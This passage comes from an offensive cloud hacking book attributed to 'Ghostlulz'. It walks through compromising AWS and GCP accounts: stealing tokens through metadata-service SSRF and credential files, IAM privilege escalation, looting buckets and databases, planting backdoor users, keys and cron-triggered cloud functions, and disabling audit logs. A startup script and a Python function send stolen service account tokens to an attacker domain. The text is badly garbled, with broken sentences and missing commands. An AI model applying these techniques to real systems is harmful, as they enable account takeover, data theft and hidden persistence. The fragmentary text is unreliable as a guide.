set(Most likely) you will be able to do all kinds of things, you might even be able to take
80
Alex Thomas AKA Ghostlulz
This has been heavily abused in the wild by attackers and a while back AWS introduced
IMDSv2 which works a little differently and helps prevent certain types of SSRF from
● https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-m
etadata-service.html
People thought that this was going to be the end of leveraging SSRF to compromise
cloud accounts. However, Amazon has stated that “Both IMDSv1 and IMDSv2 will be
available and enabled by default, and customers can choose which they will use”. This
means the insecure version IMDSv1 isn't going away anytime soon as it's enabled by
default.
Source Code
Developers love hard coding credentials into their applications as it makes their life
easier. This is always bad, unless you are an attacker then it's good for you. If you have
● {"aws_access_key_id":"AKIXXX55XXXXXXUCMXXX","aws_secret_access_
key":"I80tXXXZWXXXVO73ezzXXXXXXXQ6bvPXXX5XXXsl"}
If you're looking at source code you will typically want to look for AWS specific libraries
and imports. For example if you see a python application importing ‘boto3’ then you can
assume they are interacting with AWS so they must be passing their credentials
somehow.
Hard coded passwords are an easy way of breaking into a target's cloud environment.
Environment Variables
Another common spot for storing AWS credentials is in environment variables. Most
experienced developers know that hard coding passwords is a bad idea. However, you
have to pass credentials to your application somehow and I often see people using
environment variables.
82
Alex Thomas AKA Ghostlulz
It's always a good idea to check environment variables. You might just get lucky.
CLI
If you compromise a host where users are interacting with AWS via the CLI you can
● ~/.aws/credentials
83
Alex Thomas AKA Ghostlulz
As shown above the CLI saves its credentials in the ~/.aws/credentials file. Once you
have these credentials you can interact with AWS as that user.
Phishing
If all else fails you can always trust a good phishing email to get the job done. However,
you will have to identify the right users to send the phishing email to, create a fake AWS
84
Alex Thomas AKA Ghostlulz
I won't go into the details of phishing as all of that is out of the scope of this book.
However, if you are interested in this topic there are plenty of blogs, or videos that
Privilege Escalation
Once you have access to a cloud user you need to see if you can escalate your
privileges. In the cloud privilege escalation is done via the IAM and is typically caused
by users having certain permissions set. In AWS there are 21 publicly known IAM
● https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
85
Alex Thomas AKA Ghostlulz
iam:CreatePolicyVersion
If you have a policy attached to your user you can change the “Action” to “*” and the
“Resource” to “*” which would give you access to everything as shown below:
86
Alex Thomas AKA Ghostlulz
Finally you can use the following command to update your policy giving you admin level
access:
iam:SetDefaultPolicyVersion2
If an administrator accidently gave a policy too many privileges they might update the
can pick which version of the policy is active. This allows the user to potentially escalate
their privileges by activating an old version of a policy with higher permissions. For
example if version 1 of a policy has higher permissions than version 2 we could rollback
the policy to version 1 giving that user higher permissions as shown below:
87
Alex Thomas AKA Ghostlulz
1231124:policy/VulnerablePolicy --version-id v1
If a user has the PassRole and RunInstances permissions they can escalate privileges
to another role. The PassRole permission allows a user the ability to pass a role to
another AWS resource. Remember a role can be thought of as a user that resources
such as machines can utilize and has its own sets of permissions attached to it. Next
88
Alex Thomas AKA Ghostlulz
First you need to find a role you want to escalate too. Once you have the target role you
need to spin up an EC2 instance with the target role attached. Finally SSH into the EC2
instance and query the metadata service to steal the target's AWS token. Use the
following command to create the EC2 instance with the target role “admin” attached:
It may take a few minutes for the instance to spin up but once it does you can SSH into
and hit the metadata service as shown above. Once you have the target role token you
89
Alex Thomas AKA Ghostlulz
iam:CreateAccessKey
The iam:CreateAccessKey permission can be used to create access keys for other
users. Access keys act as credentials and can be used to issue commands as the user.
If the resource section of the policy is set to “*” while having this permission set we
As shown above we created an access key for the admin user. All we have to do is
iam:CreateLoginProfile
who doesn't have one set already. Having this permission allows an attacker the ability
to create a password for the target which can be used to login via the console.
--no-password-reset-required
iam:UpdateLoginProfile
password for a user. The only difference is that the user must already have a console
--no-password-reset-required
90
Alex Thomas AKA Ghostlulz
iam:AttachUserPolicy
The iam:AttachUserPolicy permission gives users the ability to attach policies to users.If
this permission is attached to your user you could potentially attach the AWS managed
AdministratorAccess policy to your account giving you admin permissions to the cloud
environment.
arn:aws:iam::aws:policy/AdministratorAccess
iam:AttachGroupPolicy
except you attach the policy to a group instead of a user. Just make sure you're a part of
arn:aws:iam::aws:policy/AdministratorAccess
iam:AttachRolePolicy
and iam:AttachGroupPolicy except you attach the policy to a role. Just make sure your
arn:aws:iam::aws:policy/AdministratorAccess
91
Alex Thomas AKA Ghostlulz
iam:PutUserPolicy
This permission allows you to create or update an inline policy. If this permission is set
an attacker could leverage it to add a policy with access admin level access as shown
below:
Next use the following command to add that to the target user as an inline policy. Once
executed that user should have admin level access to the cloud environment.
iam:PutGroupPolicy
This policy is very similar to the iam:PutUserPolicy permission except this allows you to
add/update inline policies to groups instead of users. Again you need to create a policy
92
Alex Thomas AKA Ghostlulz
that has admin level access and add it as an inline policy to a group your user has
access to.
iam:PutRolePolicy
only difference is that this lets you add/update an inline policy for a role. Create an
iam:AddUserToGroup
This role allows you to add users to groups. This can be abused by an attacker by
adding their user to a group that has higher permissions. If there is a group with admin
level permissions try adding your user to it, if successful your user should also have
USER_NAME
93
Alex Thomas AKA Ghostlulz
Enumeration
Once you have access to a cloud account you need to figure out what resources your
user has permissions to interact with. AWS has hundreds of services so we can't cover
everything but you should at least be familiar with the basic ones.
S3 Buckets
I'm sure you have heard of S3 buckets but if you haven't it is a public cloud storage
resource used to store files and other objects. As an attacker this is definitely something
you want to look for as it has the potential to house sensitive data.
94
Alex Thomas AKA Ghostlulz
As shown above we are able to list all the S3 buckets in the cloud environment.
However, in some cases you may have access to an S3 bucket but be missing the
permission or policy necessary to list the names of S3 buckets. In that case you would
have to be able to guess or bruteforce the name of the S3 bucket you have access to.
Once you know the name of an S3 bucket you can view its contents by issuing the
● aws s3 ls YOUR_BUCKET
This will list out all the files and folders in your bucket. To download a file you can issue
As shown above we are downloading the text file “file.txt” to our local system. You could
95
Alex Thomas AKA Ghostlulz
Virtual Machines
AWS has several types of virtual machines but the most popular one is the Elastic
Compute Cloud(EC2). You can use Amazon EC2 to launch as many or as few virtual
servers as you need, configure security and networking, and manage storage.
As shown in the image above the aws ec2 describe-instances command returns a list
of EC2 instances and their related information such as its IP address, instanceid, name,
96
Alex Thomas AKA Ghostlulz
and much more. The above returns a lot of information but you can filter down the
output using the built in JSON parser via the –query argument.
"Reservations[*].Instances[*].{PublicIP:PublicIpAddress,Name:Tags[?Key=
='Name']|[0].Value,Status:State.Name}"
As you can see in the image above the returned results are much easier to read. EC2
instances are used to run all kinds of things such as websites, databases, kubernetes
Databases
hold all kinds of interesting things such as usernames and passwords. Depending on
the technical requirements there may be several different kinds of databases running in
an environment.
97
Alex Thomas AKA Ghostlulz
AWS has services to handle everything but we will focus on the “Amazon RDS” service
which is hosting a MySql database. To get a list of the running databases run the
following command:
98
Alex Thomas AKA Ghostlulz
As you can see above we get some information about each of the running databases.
One of the fields returned is the address and root user. If the address is a publicly facing
URL you could use that with the root user to launch a brute force attack.
Depending on your permissions you may be able to reset the master password. This
After you reset the master password you can login to the database and download
everything. However, changing the root password will definitely set off the alarms and
you may break any applications using that account, so be careful when doing this.
Elastic BeanStalk
AWS Elastic Beanstalk(EBS) is an easy-to-use service for deploying and scaling web
applications and services developed with Java, . NET, PHP, Node. js, Python, Ruby, Go,
and Docker on familiar servers such as Apache, Nginx, Passenger, and IIS. This means
we can use EBS to easily deploy applications with the click of a button or shell
Typically you will see the front end or API deployed to a beanstalk environment. These
99
Alex Thomas AKA Ghostlulz
I would take special note of the “EndpointURL” variable. This will have a public url
pointing to the application hosted by EBS. Once you have this endpoint you can launch
further attacks against that application such as looking for OWASP top 10 vulns if it is a
web application.
100
Alex Thomas AKA Ghostlulz
Another interesting thing about EBS is that it will deploy the application to an EC2
instance from the source code contained in an S3 bucket. When we press the deploy
button it takes our source code and saves it to a S3 bucket then it is deployed to a
virtual machine from that file. This means we should be able to find the source code of
all EBS applications in an S3 bucket. Anyone who has access to that S3 bucket will also
As you can see in the image above there is indeed an S3 bucket with the name of
If you issue the ls command on that s3 bucket you should see a bunch of .zip files.
These zip files contain the source code for the applications deployed to beanstalk. The
next step is to download these files and analyze the source code for hardcoded
101
Alex Thomas AKA Ghostlulz
Persistence
New User
One of the easiest ways to backdoor a cloud environment is to create a new user who
has full access to that environment. As shown below you can use the “aws iam
Once you have this user created you should put them in a group with the highest
privileges. To do add a user to a group you can use the following command:
My!User1Login8P@ssword
102
Alex Thomas AKA Ghostlulz
Access Keys
If a user changes their password you won’t be able to access that user anymore.
However, any access keys that user has will still be active and valid. If you have the
an access key for them. This can be done with the following command.
Now that you have an access key you can use this with the AWS cli to interact with the
Conclusion
AWS is huge so we could only cover the basics of AWS hacking but the basics will still
put you way ahead of the pack and for 90% of cloud environments the basics is all you
103
Alex Thomas AKA Ghostlulz
need. You know the most popular initial compromise methods, you know how to
escalate privileges, you know what services have juicy information, and you know how
to persist in an AWS cloud environment. If you want to take things to the next level I
recommend reading more books, blogs, and videos on the topic, there is a lot of
104
Alex Thomas AKA Ghostlulz
Introduction
Google Cloud Platform(GCP)is the third most popular cloud computing platform out
there. Most of the services in GCP are similar to AWS and other platforms but there are
The structure of a GCP account starts at the organization, this will be the same as your
domain name, so if you attach a domain called “example.com” your organization's name
made up of other folders and projects. Lastly there are projects which are where
everything lives. Note if a domain is not attached to GCP you will only have projects
available to you.
105
Alex Thomas AKA Ghostlulz
When signing into GCP a project will look something like the following:
106
Alex Thomas AKA Ghostlulz
As you can see above we are in a project called “test-project”, there is 1 compute
engine instance running, 4 storage buckets, and 1 sql instance running. All of your
infrastructure will be created within a project, you will also find users and their
permissions in here.
A typical organization will have many projects, for example they might have one project
for the dev environment, one for testing, and another for production. Also users can be
apart of multiple projects so if you compromise a cloud account you should always look
to see which projects they have access to, this will allow you to move laterally in a cloud
organization
IAM
IAM is the service that decides what resources members have access to. In GCP a
107
Alex Thomas AKA Ghostlulz
● User
● Service Account
● Group
● Organization
Roles are applied to members and are used to dictate what services they can interact
with. Each role will have a set of permissions which determine exactly what a user has
access to. All of these settings are wrapped up in a policy which is used to dictate what
User Accounts
There are two types of members in GCP, one is a human and the other is a machine.
Machines typically use service accounts and humans will use their gmail or domain
● User
108
Alex Thomas AKA Ghostlulz
● Service Account
Any machine you spin up or cloud function you create will have a service account
attached to it. This is how the instances are able to interact with the rest of GCP. For
example if you spin up a virtual machine and want it to have access to your storage
bucket it needs a way of doing this and the solution is to use a service account to
Roles are attached to members and each row is made up of a collection of permissions.
These permissions dictate exactly what a member can and can’t do on GCP. There are
● Basic
● Predefined
● Custom
When looking at permissions, always be on the lookout for basic AKA primitive roles.
There are three types of primitive roles which give access to way more than needed,
● Primitive Roles
○ Owner
○ Editor
access to everything.
109
Alex Thomas AKA Ghostlulz
○ Viewer
■ This is a little less exciting, basically it lets you view anything but
of editor. This service account is used by default when spinning up virtual machines
which means if we can compromise this service account we get instant Admin level
110
Alex Thomas AKA Ghostlulz
You can also see the roles “security reviewer”, “service usage admin”, and “stackdriver
accounts viewer”. These are predefined roles which GCP has already setup with
predefined permissions. Lastly you can see the role “priv_esc_role” which is a custom
role made by the admin and it can contain any number of permissions in it.
111
Alex Thomas AKA Ghostlulz
The above image shows that the editor role has 3,098 permissions assigned to it, which
different service. Roles and permissions will play a big part when attempting privilege
Compute Engine
Introduction
The computer engine is where you create and interact with your virtual machines. If
your organization heavily uses the cloud you could have hundreds of instances running
in your environment.
112
Alex Thomas AKA Ghostlulz
When creating these virtual machines you must attach a service account to it so it can
113
Alex Thomas AKA Ghostlulz
By default it will use the compute engine default service account, we saw earlier that
When using this default account you must also specify its access scopes. Access
scopes limite which API calls you can make so even though you have an Editor role you
might still have limited permissions because of your scope. If the scope is set to “Allow
full access to all Cloud APIs” these restrictions are removed and you will have access to
everything. This will come up later when we talk about SSRF. Note that scopes only
apply to the default service account, all other service accounts will use your IAM roles
114
Alex Thomas AKA Ghostlulz
Metadata
So our instance has a service account linked to it but how does it use this account? To
use the service account it needs its credentials and these credentials can be found via
● http://169.254.169.254/computeMetadata/v1beta1/instance/service-accounts/def
ault/token
● http://169.254.169.254/computeMetadata/v1beta1/project/project-id
As shown in the above image if we hit the metadata server we can get the service
accounts access token. We can then utilize this access token to authenticate to
Google's APIs which will allow us to issue commands to the GCP environment.
Authenticating
Gcloud and Gsutil are both command line tools created by Google, these tools are
perfect when you have access to service account keys. However, there are times when
you only have access to a temporary access key. In that case you will have to use the
Google API or SDK. An example Google API call can be found below:
115
Alex Thomas AKA Ghostlulz
"https://storage.googleapis.com/storage/v1/b?project=PROJECT-HERE"
Depending on what service you are trying to call you will have to modify the endpoint
you send your request to. Other than that you just place your access token in the
If your want to use your access token with the Google SDK it will look something like:
Initial Access
SSRF
You should already know how to exploit SSRF from the AWS hacking chapters so I
won’t cover it again here as that part will be the same. The only difference is the
● http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/d
efault/token
116
Alex Thomas AKA Ghostlulz
Be aware if V2 is enabled you may also have to send a custom header as shown in the
example below:
● "Metadata-Flavor: Google"
There are a few types of credentials you could find in an application's source code. The
first type is an API key. As shown below your application would have to make an HTTP
● https://language.googleapis.com/v1/documents:analyzeEntities?key=API_KEY
If you're looking at source code grepping for “googleapis.com” could reveal strings
In addition to API keys you can also use a JSON file containing credentials. Instead of
hard coding credentials you must hard code a path that contains credentials. If you have
117
Alex Thomas AKA Ghostlulz
function. If you're auditing a python script and ever see that function being called you
should also try to access the json file that is passed to it for credentials. Other
Environment Variables
below image these credentials are stored in a json file and placed into the
Once you have access to this JSON file you have access to the user's credentials.
Phishing
When all else fails try phishing. If you know the emails of people on the GCP
118
Alex Thomas AKA Ghostlulz
Most engagements prohibit phishing attacks. However, red teaming and social
engineering engagements typically have this attack vector in scope so it's still good to
know.
119
Alex Thomas AKA Ghostlulz
IAM Permissions
The vast majority of the privilege escalation techniques are around members' roles and
Some permissions grant special rights which can be leveraged by an attacker. To get a
full understanding of these permissions and how they can be exploited check out the
detailed blog post by Rhino Security Labs where they highlight these privilege
escalation techniques:
120
Alex Thomas AKA Ghostlulz
● https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-
1/
● https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-plat
form-part-2/
Deploymentmanager.deployments.create
could abuse this permission to create a compute instance, add a startup script to gather
service accounts access tokens via the metadata service, and finally send it back to the
attacker.
The first step is to create the YAML file used to set up the compute engine instance.
121
Alex Thomas AKA Ghostlulz
Notice the startup script makes a curl request to the metadata service then it takes the
response and sends it to the attacker's computer. This config file can be found below,
resources:
- name: vm-created-by-deployment-manager
type: compute.v1.instance
properties:
zone: us-central1-a
machineType: zones/us-central1-a/machineTypes/n1-standard-1
disks:
- deviceName: boot
type: PERSISTENT
boot: true
autoDelete: true
initializeParams:
sourceImage: projects/debian-cloud/global/images/family/debian-9
networkInterfaces:
- network: global/networks/default
accessConfigs:
type: ONE_TO_ONE_NAT
metadata:
items:
- key: startup-script
value: |
#!/bin/bash
apt-get update
122
Alex Thomas AKA Ghostlulz
http://169.254.169.254/computeMetadata/v1beta1/instance/service-accounts/default/token)
serviceAccounts:
- email: default
scopes:
- https://www.googleapis.com/auth/cloud-platform
Next you need to create the compute engine with the deployment manager command
as shown below:
--config <CONFIG-FILE-NAME>.yaml
Once the compute engine is spun up you should receive a call back with the newly
123
Alex Thomas AKA Ghostlulz
Iam.roles.update
permission allows you to add additional permissions to a custom role. If you have a
custom role applied to your account you could add additional permissions to that role
<PROJECT-ID>--permissions=<PERMISSION-1,PERISSION-2>
Note, updating a custom role will overwrite any existing permissions in that role.
role allows users to create service account keys for other users.
iam.serviceAccounts.getAccessToken
victim. Unfortunately I couldn't find a gcloud cli command to do this but we can use the
124
Alex Thomas AKA Ghostlulz
'https://www.googleapis.com/auth/iam',
'https://www.googleapis.com/auth/cloud-platform' ] }"
https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/<TARGET-S
ERVICE-ACCOUNT>:generateAccessToken
iam.serviceAccountKeys.create
but this permission allows you to create permanent keys which are attached to a service
--iam-account=IAM_ACCOUNT
125
Alex Thomas AKA Ghostlulz
iam.serviceAccounts.actAs
This permission allows you to create resources using another service account. For
example if you wanted to create a compute instance and attach another service account
to that VM you would need this permission along with the permission to create VMs.
More examples of this can be found in the below sub sections which require this
permission to work.
Cloudfunctions.functions.create
● iam.serviceAccounts.actAs
● Cloudfunctions.functions.create
● Cloudfunctions.functions.sourceCodeSet
● Cloudfunctions.functions.create
Here we are creating a cloud function as another service account which when called will
grab the service accounts access token and send it to the attacker's machine.
126
Alex Thomas AKA Ghostlulz
Rhino Security Labs also created a tool which can be used to search for and exploit
these misconfigurations:
● https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation
To use this tool you must have a valid Access Token and project id. Access tokens and
project ids can be retrieved in many ways but one of the most popular is via SSRF.
Note that if you don't have the right permissions the command will fail and you won't be
able to check for privilege escalation, however you could do the brute force approach
and just manually try all the exploits by hand until one works.
If you do have the correct permissions the command will run and it will save everything
to a folder. The next step is to run the “python3 check_for_privesc.py” command. This
127
Alex Thomas AKA Ghostlulz
will check for all the possible ways you can compromise other accounts given the
actually run the exploits you need to move to the exploits folder. Then you just pick your
exploit, edit the python file with your details, and run the script.
128
Alex Thomas AKA Ghostlulz
One of my favorite things to do is create service account keys for other accounts, if
successful this will allow you to login as that service account, this is great for lateral
movement.
As you can see in the above source code we need to put in the project id and our target
service account. After that, run the script and it will ask for your access token, after the
script is complete it will create and output the target service account key.
129
Alex Thomas AKA Ghostlulz
Next you have to base64 decode the “privateKeyData” which should present you with a
json blob. This json blob is your credentials. Once you have the credentials you can use
If the user has higher privileges than us then we just perform privilege escalation, if they
don't then we can use this for lateral movement. In addition we can also use this same
As you can see above we create a user managed key under the “Compute Engine
130
Alex Thomas AKA Ghostlulz
This is just an example of one of the exploits available to us, there are many more
techniques we can use for privilege escalation and lateral movement, just look at the
Enumeration
When you get access to a cloud account one of the first things you need to determine is
what services you have access too. Depending on your permissions this can be straight
forward or slightly harder. If you have any of the primitive roles of owner,editor, or viewer
you probably have all the permissions you need to discover everything in the cloud
environment, just use Gcloud, Gsutil, Google SDK Library, or Google APIs and start
querying things.
Tools
There are several tools that can be used in this phase as shown below:
● Gcloud
● Gsutil
● Google API
131
Alex Thomas AKA Ghostlulz
Buckets
Buckets are used to hold files, these files can include logs, credentials, source code, or
anything else you would consider sensitive. Most organizations know not to store
sensitive information in public buckets but private buckets are typically fair game. The
first thing you need to do is get a list of all buckets the user has access to. If we have
permissions to list buckets we can use the gsutil tool to do this for us, note this requires
a services account key or account credentials to use, access tokens and API keys will
● Gsutil ls
If you only have an access account you can query the google api directly with the
following command:
"https://storage.googleapis.com/storage/v1/b?project=PROJECT-HERE"
132
Alex Thomas AKA Ghostlulz
Once you have a list of buckets you can start seeing what's in them. There's no telling
what hidden gems you can uncover by pilliging a cloud storage bucket. People store all
kinds of things in here like credentials, encryption keys, and anything else that would be
considered sensitive. During the discovery phase you should have uncovered any
buckets in your target GCP environment, now is the time to look around to see what you
can find.
● gsutil ls gs://STORAGE_BUCKET_NAME
You can also dump the contents of a file with the “cat” command:
133
Alex Thomas AKA Ghostlulz
Note this is a rtf file that's why you see all the weird encoding. Normally I would just pipe
this to a file and open it up locally. You can also copy an entire bucket over to your local
machine:
I like this approach as I can analyze everything on my local machine instead of sending
hundreds of commands to GCP. I would just copy every storage bucket you have
Instances
Chances are that your target cloud environment is running multiple virtual machines. It’s
a good idea to map out your environment to see what machines are running and which
ones you have access to. This can be done using gcloud as shown below:
You can also use the compute google api to pull this information if you only have an
access token.
Databases
Databases are always a gold mine if you can extract the information off of it. If your
target cloud environment is running any kind of web application it probably has a
database to store all the user information. Finding these databases can be a GOLD
mine. You can use gcloud and google APIs to find these instances as shown below:
134
Alex Thomas AKA Ghostlulz
When you store things on GCP(Storage Bucket) you can either store them in plain text
or you can encrypt them with a key. These keys are stored in the Key management
systems (KMS). If you have access to a key you can then use that to decrypt sensitive
Images
When you create a compute engine virtual machine you have the option to upload your
own custom image for the machine to run from. It's a good idea to figure out where
these images are so we can later download them and see what secrets are on them.
135
Alex Thomas AKA Ghostlulz
Containers
Devops has become increasingly popular over the years and containerizing your
application has become the norm. These docker containers need a place where they
can be stored and that’s where the container registry comes in. Getting a list of docker
containers can be very helpful later down the road when you decide to download them
and see what secrets you can extract. In addition to that you can also backdoor these
containers. Both of these techniques were described earlier in the book in the Docker
Hacking chapters, if you want to learn more about container hacking refer to those
chapters.
Kubernetes
Unlike other cloud platforms kubernetes seems to be really popular among GCP users.
It's generally a good idea to see what kubernete clusters are available to you. This can
We won’t cover kubernetes hacking again because it was covered earlier in the book. If
you want to learn more about kubernetes hacking refer to those chapters.
136
Alex Thomas AKA Ghostlulz
You can gather all this information by hand or you can use a script to get everything for
you. I personally like to do things manually but if I'm in a rush, feeling lazy, or don't have
access to a service account key I'll take this approach. You can download the
● https://github.com/NotSoSecure/cloud-service-enum
What's nice about this tool is that it takes an access key and not a service account key.
So if you got SSRF which returns an access key and cant get a service account key
then no problem. Another nice feature of this tool is that it brute forces every service to
determine what you can access, so if you don't have permissions to list what services
To run the tool you must have an access key and a project id:
137
Alex Thomas AKA Ghostlulz
This will generate a lot of output so you might want to pipe everything to a file so you
Persistence
If you get into a target cloud environment you probably want to ensure that you don’t
lose access. There are several persistence techniques that can be used to backdoor
accounts and infrastructure. Note that anywhere I use the gcloud cli can be swapped
138
Alex Thomas AKA Ghostlulz
There are several ways you can authenticate to GCP and one of them is through
service account keys. Service accounts can have multiple keys associated with them
and each one will give you access to GCP as that user.
In the above image we can see that this service account has two keys associated with
it. Whoever has these keys will be able to authenticate as that user. Another thing you
might have noticed is the expiration date. When you create these by default it will be set
You may recall us creating a service account key in the privilege escalation and lateral
technique can be used to backdoor service accounts. I'll be using gcloud to perform this
139
Alex Thomas AKA Ghostlulz
action but you can use the same exploit script from Rhino Security Labs to do this as
● https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master
/ExploitScripts/iam.serviceAccountKeys.create.py
If your using gcloud you can run the following command to create a service account key
--iam-account=IAM_ACCOUNT
Next import the key into gcloud and you will be able to interact with GCP as that user.
Note to run this command you will have to have the correct permissions set, otherwise
you will be denied. If you do have the correct permissions you can backdoor every
service account in the project allowing you easy access into the target cloud
environment.
140
Alex Thomas AKA Ghostlulz
Cloud Function
Cloud functions make great backdoors. All you have to do is create an unauthenticated
cloud function whose trigger is an HTTP request. Next you set your cloud function to
After that you just have to navigate to the cloud function API to execute your OS
command. I typically just use curl to hit the metadata service which pulls down the
If you don't want to create a new function you can also update another cloud function to
141
Alex Thomas AKA Ghostlulz
To use this technique with gcloud just enter the following commands:
Note if you don't have permissions to set an IAM policy you won't be able to make
the function unauthenticated which means you will have to be logged in to call
the function. In the above example you tell the function is not authenticated even
though we specified it should be. We can tell this because of the Warning it gave
Cron Job
If you’re familiar with Linux cron jobs Google Cloud Scheduler is the same thing. It's
common for linux malware to use cron jobs for persistence and the same technique can
142
Alex Thomas AKA Ghostlulz
These cron jobs can be used as triggers for many things but I'll be using it to send a
Pub/Sub message. We can then set up a cloud function that will be triggered when it
receives a Pub/Sub message. The cloud function can do anything you want but I'll be
The first step is to create a Pub/Sub topic as shown below. This topic will be used to
143
Alex Thomas AKA Ghostlulz
Next create a cron job, in this example i'll create a cron job that executes every minute.
This cron job will post a message to a Pub/Sub topic ultimately triggering the malicious
cloud function.
● gcloud scheduler jobs create pubsub myjob --schedule "* * * * *" --topic mytopic
--message-body "Hello"
144
Alex Thomas AKA Ghostlulz
Finally create the malicious cloud function. This function should be used to do some
malicious action, in this example it will send the attacker an authentication token.
<PYTHON-FUNCTION-NAME>--runtime python37
--trigger-topic=<TOPIC-NAME>
145
Alex Thomas AKA Ghostlulz
As you can see in the below image the cloud functions source code is fairly simple. First
we hit the metadata service to grab the attached service accounts authentication token.
import requests
import json
Args:
"""
r = requests.get(url =
"http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token",headers={"Metadata-Flavor":"
Google"})
PARAMS = {"data":r.text}
requests.get(url="http://<ATTCKER-DOMAIN-HERE>/",params = PARAMS)
146
Alex Thomas AKA Ghostlulz
Once the cron job runs it will send a message to the Pub/Sub topic. The malicious cloud
function will be listening to this topic and when triggered it grabs the attached service
Cron jobs have been used as a persistence technique for years and we can use the
Defense Evasion
Audit Logs
Cloud Audit Logs helps security teams maintain audit trails in Google Cloud Platform
(GCP). If enabled this will log Admin read, Data read, and/or Data Write commands for
the specific service and APIs. To get a list of services that have audit logging enabled
147
Alex Thomas AKA Ghostlulz
As you can see in the above image this project has Admin read, Data read, and Data
write logging enabled on all services. Anything and everything we do on the platform is
To delete this we will need the ability to set an iam-policy on the project. This level of
permissions will require a super admin account (owner) or someone with the ability to
set an iam policy which is typically not given out. However, if you do happen to have the
right permissions for this all you have to do is delete the -auditLogConfigs section of the
● Nano IAM-POLICY.YAML
Conclusion
AWS hacking is very popular but there is less popularity around GCP hacking. The
information covered in this chapter should equip you with the necessary knowledge to
take on the vast majority of GCP environments. You know the most popular initial
148
Alex Thomas AKA Ghostlulz
compromise methods, you know how to escalate privileges, you know what services
have juicy information, and you know how to persist in a GCP cloud environment.
149
Alex Thomas AKA Ghostlulz
Summary
Cloud hacking is a huge topic and we have only scratched the service. However, if you
completed this book you are off to a really good start and will be better equipped than
95% of the people out there. If you want to hack the cloud you must first understand the
technology stack.
At a high level cloud hacking follows the same steps but at a technical level things look
fairly different. You learned that these higher level steps are initial access, privilege
escalation, enumeration, persistence, and defense evasion. At the technical level you
should have the skills necessary to deal with kubernetes, AWS, and GCP environments.
There are still other things I didn't have time to cover such as Azure, Alibaba, Yandex
Cloud, Microservices, SAAS platforms, and a bunch of other cloud hacking topics. I'll
Twitter: https://twitter.com/ghostlulz1337
Website: http://ghostlulz.com
150